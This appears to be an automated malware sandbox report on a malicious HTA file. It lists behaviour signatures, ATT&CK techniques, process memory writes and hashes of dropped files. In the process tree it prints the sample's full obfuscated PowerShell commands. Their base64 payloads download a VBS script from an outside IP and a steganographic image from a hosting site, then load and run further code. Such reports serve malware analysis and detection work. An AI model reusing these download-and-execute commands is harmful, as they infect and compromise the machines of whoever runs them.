8b1b3e1f69d6d339e2b77e1610457544b1774eb184b53b490d37e17667c4dd68

Analysis

max time kernel
118s
max time network
125s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
12-02-2025 19:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

createdbestthingswithbetterwaysgivemebestfor.hta
Size

13KB
MD5

716aaf1d9cad7adc83165137b0908eef
SHA1

0f14cba90b4ff8c0e096c514692b31e402d456f3
SHA256

8b1b3e1f69d6d339e2b77e1610457544b1774eb184b53b490d37e17667c4dd68
SHA512

39026bcce661a0ed079419732d3acf97ed815f33fc9b29bc5c5013aa0fa5ef82d5a41f66a2b3e104feaa7b2752f0b22b65fcebe02122b4ef48d01387f20a7ec1
SSDEEP

48:3vUzyAm9euUzyLKm9elka93UDmCKpy4MOFpNrnUzygSUzyURxx/m9esvUzyhPG:ctj9AH6F7n2TXw+

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2936	powershell.exe
6	2212	powershell.exe
8	2212	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2936	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2212	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2936	powershell.exe
2212	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2816 wrote to memory of 3052	2816	mshta.exe	30
PID 2816 wrote to memory of 3052	2816	mshta.exe	30
PID 2816 wrote to memory of 3052	2816	mshta.exe	30
PID 2816 wrote to memory of 3052	2816	mshta.exe	30
PID 3052 wrote to memory of 2936	3052	cmd.exe	32
PID 3052 wrote to memory of 2936	3052	cmd.exe	32
PID 3052 wrote to memory of 2936	3052	cmd.exe	32
PID 3052 wrote to memory of 2936	3052	cmd.exe	32
PID 2936 wrote to memory of 2884	2936	powershell.exe	33
PID 2936 wrote to memory of 2884	2936	powershell.exe	33
PID 2936 wrote to memory of 2884	2936	powershell.exe	33
PID 2936 wrote to memory of 2884	2936	powershell.exe	33
PID 2884 wrote to memory of 2700	2884	csc.exe	34
PID 2884 wrote to memory of 2700	2884	csc.exe	34
PID 2884 wrote to memory of 2700	2884	csc.exe	34
PID 2884 wrote to memory of 2700	2884	csc.exe	34
PID 2936 wrote to memory of 1384	2936	powershell.exe	36
PID 2936 wrote to memory of 1384	2936	powershell.exe	36
PID 2936 wrote to memory of 1384	2936	powershell.exe	36
PID 2936 wrote to memory of 1384	2936	powershell.exe	36
PID 1384 wrote to memory of 2212	1384	WScript.exe	37
PID 1384 wrote to memory of 2212	1384	WScript.exe	37
PID 1384 wrote to memory of 2212	1384	WScript.exe	37
PID 1384 wrote to memory of 2212	1384	WScript.exe	37

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\createdbestthingswithbetterwaysgivemebestfor.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOWeRSheLL -ex bYPasS -NoP -w 1 -C deVICeCredentiaLdeplOyMENT ; IeX($(IEx('[sYsTem.TeXT.encoDINg]'+[cHaR]58+[chAR]0x3A+'UTF8.gETStRing([SYSTeM.CoNvErT]'+[CHAr]0X3A+[cHAR]0x3a+'FROmBASE64stRInG('+[chAR]34+'JFNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFckRFZkluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYlBydSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOcmRUZSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIaUJGYSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc29PUUxWUllHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9lUUJTVnUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJHWXBrVlciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxXYkdnVmtnV1QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNaOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjYuMTc5LjIxMC4xOS83OC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhiZXR0ZXJ3YXlzZ2l2ZW1lYmVzdGZvci5nSUYiLCIkZW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoYmV0dGVyd2F5c2dpdmVtZWJlc3Rmby52YnMiLDAsMCk7U3RBclQtU0xlRXAoMyk7SU5WT0tFLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aGJldHRlcndheXNnaXZlbWViZXN0Zm8udmJzIg=='+[CHAR]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWeRSheLL -ex bYPasS -NoP -w 1 -C deVICeCredentiaLdeplOyMENT ; IeX($(IEx('[sYsTem.TeXT.encoDINg]'+[cHaR]58+[chAR]0x3A+'UTF8.gETStRing([SYSTeM.CoNvErT]'+[CHAr]0X3A+[cHAR]0x3a+'FROmBASE64stRInG('+[chAR]34+'JFNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFckRFZkluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYlBydSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOcmRUZSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIaUJGYSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc29PUUxWUllHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9lUUJTVnUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJHWXBrVlciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxXYkdnVmtnV1QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNaOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjYuMTc5LjIxMC4xOS83OC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhiZXR0ZXJ3YXlzZ2l2ZW1lYmVzdGZvci5nSUYiLCIkZW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoYmV0dGVyd2F5c2dpdmVtZWJlc3Rmby52YnMiLDAsMCk7U3RBclQtU0xlRXAoMyk7SU5WT0tFLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aGJldHRlcndheXNnaXZlbWViZXN0Zm8udmJzIg=='+[CHAR]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2936
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4kdqunlm.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2884
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6AF4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6AE3.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2700
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdbestthingswithbetterwaysgivemebestfo.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1384
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABtAG8AdgBpAGUAZwBvAGUAcgBzACAAPQAgACcAdAB4AHQALgByAG8AZgB0AHMAZQBiAGUAbQBlAHYAaQBnAHMAeQBhAHcAcgBlAHQAdABlAGIAaAB0AGkAdwBzAGcAbgBpAGgAdAB0AHMAZQBiAGQAZQB0AGEAZQByAGMALwA4ADcALwA5ADEALgAwADEAMgAuADkANwAxAC4ANgA2AC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBhAGkAbgBvAHUAdABzACAAPQAgACQAbQBvAHYAaQBlAGcAbwBlAHIAcwAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBzAG8AYwBoAHIAbwBtAG8AcwBvAG0AZQBzACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABvAHcAMgBzAGYAZgBzADcALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMAOQAzADQAMwA0ADEAMgAvAGQAdQBsAHgAawByAHUAbwBlAGUAcAAxAGkAdAB6ADcAbAB0ADYAYgAuAGoAcABnACcAOwAkAHAAYQBjAGgAeQBkAG8AbQB1AHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAZwByAGEAbgB1AGwAYQB0AGkAbgBnACAAPQAgACQAcABhAGMAaAB5AGQAbwBtAHUAcwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAHMAbwBjAGgAcgBvAG0AbwBzAG8AbQBlAHMAKQA7ACQAdABhAHIAZAB5AG8AbgBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZwByAGEAbgB1AGwAYQB0AGkAbgBnACkAOwAkAGEAcgBjAGgAZQB0AHkAcABhAGwAbAB5ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJAByAGEAZABnAGUAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB1AGwAZgBhAG0AYQB0AGUAIAA9ACAAJAB0AGEAcgBkAHkAbwBuAHMALgBJAG4AZABlAHgATwBmACgAJABhAHIAYwBoAGUAdAB5AHAAYQBsAGwAeQApADsAJABhAGwAYgBhAG4AIAA9ACAAJAB0AGEAcgBkAHkAbwBuAHMALgBJAG4AZABlAHgATwBmACgAJAByAGEAZABnAGUAKQA7ACQAcwB1AGwAZgBhAG0AYQB0AGUAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABhAGwAYgBhAG4AIAAtAGcAdAAgACQAcwB1AGwAZgBhAG0AYQB0AGUAOwAkAHMAdQBsAGYAYQBtAGEAdABlACAAKwA9ACAAJABhAHIAYwBoAGUAdAB5AHAAYQBsAGwAeQAuAEwAZQBuAGcAdABoADsAJABTAGgAbwB3AHQAYQByAG8AIAA9ACAAJABhAGwAYgBhAG4AIAAtACAAJABzAHUAbABmAGEAbQBhAHQAZQA7ACQAbQBlAHQAaAB5AGwAZQBuAGEAdABpAG8AbgAgAD0AIAAkAHQAYQByAGQAeQBvAG4AcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHUAbABmAGEAbQBhAHQAZQAsACAAJABTAGgAbwB3AHQAYQByAG8AKQA7ACQAdABlAHIAYwBlAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABtAGUAdABoAHkAbABlAG4AYQB0AGkAbwBuACkAOwAkAHYAbwB4AGUAbABhAHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAHQAZQByAGMAZQBsAHMAKQA7ACQATABhAG4AZABzAHQAZQBpAG4AZQByACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcgBhAGkAbgBvAHUAdABzACwAJwAnACwAJwAnACwAJwAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4kdqunlm.dll

Filesize
3KB

MD5
bfaa5536747cfd7a1670358b2b50260f

SHA1
3c79802994c6bb4f47e92a3ff4e94a964b845ed3

SHA256
de4a003a5a7b1facdea2e535789d6b7c002fafefb2f094bd6487419d5988f850

SHA512
ecfd377cbf4df2bdc42d7d9594385f6695b29f30e169e2b013492909ae330e4c188363e438d9c79f578668f09f9209651ae6e4d9e545080726d6ccfd484a2d1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\4kdqunlm.pdb

Filesize
7KB

MD5
43482666e37e430273f670dac78912cd

SHA1
9a63dfd30bdd8a68864904edb5e8dc24cec42af1

SHA256
485cb66697de4f632a606815ee697cd176c6992f72299a2236f433073f3feca1

SHA512
715400fdc73a62398b0efe1fd020ca5e4500b3065878a5ef93b875884e36518c8ec21c002bd84ff7f931a440f346355c6ee54be738eb71a6d5a1752ef25a2133

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabAA55.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6AF4.tmp

Filesize
1KB

MD5
7323687b18e44073060be3eb7e87266e

SHA1
3dab0071556cf553d81cc07ccbc7d088f9c414d8

SHA256
8784427166d37f0eb740618c500b3eebe0b1be54270c2ee915cc18ea006350b6

SHA512
4505ec68cd100f79e82a3b7a6e220cc8b60da9b035352a17b145776b1bda1a669ab0abc08afb1a2248151e7f2291a8e25655a93336014f55a2dbbe1236588d65

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarAA96.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
6d2c653e83d1c573dab1539170f10453

SHA1
cb008057fd06c672a6bd7f9e073e89950552fe9f

SHA256
f08d4fcde554cb06497db1e3ff8ca2354d47a25e4b62aedb2e2cfa129a43dfd3

SHA512
f282b6dc7bdea18679bcf6917ea7f2ca566f2795f8df13d066f6b829f4ae0e91561ab86666f4456b7aae18962e459f0167605a77c1580356b696b7c0deedaed6

Download Submit
C:\Users\Admin\AppData\Roaming\createdbestthingswithbetterwaysgivemebestfo.vbs

Filesize
185KB

MD5
d1a520981074e155f1570387b46e9724

SHA1
5150f94de3bdb5be53c218af073524c3d64ed6bc

SHA256
b3b2720ea2c5243f79f6a899d4321707d5addb9fc54205474b2b638754bcdd86

SHA512
c3e8a95871242f8bf13ed0afb25faf6fb56c003fe082cf5919087dd1fdb9ed2abc0710a2c75e974bd986848763634a7001c5512d233077d682e19bb5de487b12

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4kdqunlm.0.cs

Filesize
479B

MD5
5ca8b3b96d2695309cfbd4f34b6eea78

SHA1
e73ab602e98264c5ee77951e0a1a5c68e76c9ef1

SHA256
9038c28180d1942c8b33e663baf7b7385bad8a90d8f86f07992084bff51f53d3

SHA512
ada39b83ef545e121272dc94fe974685d4ac29125dd829971162efaecc0de134043302d0a19d2cd4f4331020dff65e02ad5447c5243664906a81715607cd29c6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4kdqunlm.cmdline

Filesize
309B

MD5
e50550877537c52e1c0f30b8fad72e46

SHA1
14c508b57f3b5770ce8956464fc3b6558c23fb84

SHA256
a0964043548daab5979ae13f3bf3231d09bce735fd91367171fefcbcbfedc4ef

SHA512
68bc2f096565ab071b0faaf3d54294f2a7f9ebf9f08fd0d8fd9a6a2473c3b2695376af725bfb435fa3de721ea657b4df3b316c924cd54a34ba4a6e0c2d7a15df

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6AE3.tmp

Filesize
652B

MD5
02daba94dc7431c0e198a175ceb9904a

SHA1
fb40b6208fbe3e21c3b0cee37d1d64b89f505b1a

SHA256
01021918d15335950d38309bc57e94ad04fec2b612e53ddecb7a71a47efbf678

SHA512
49d393c940d1d1687beaf87117318a6e6865bb7a4564a39e2aef4b8af65c8af506c6d7cc044b6a72023a38cb5d6216534a402611c879bd81b145c165653de221

Download Submit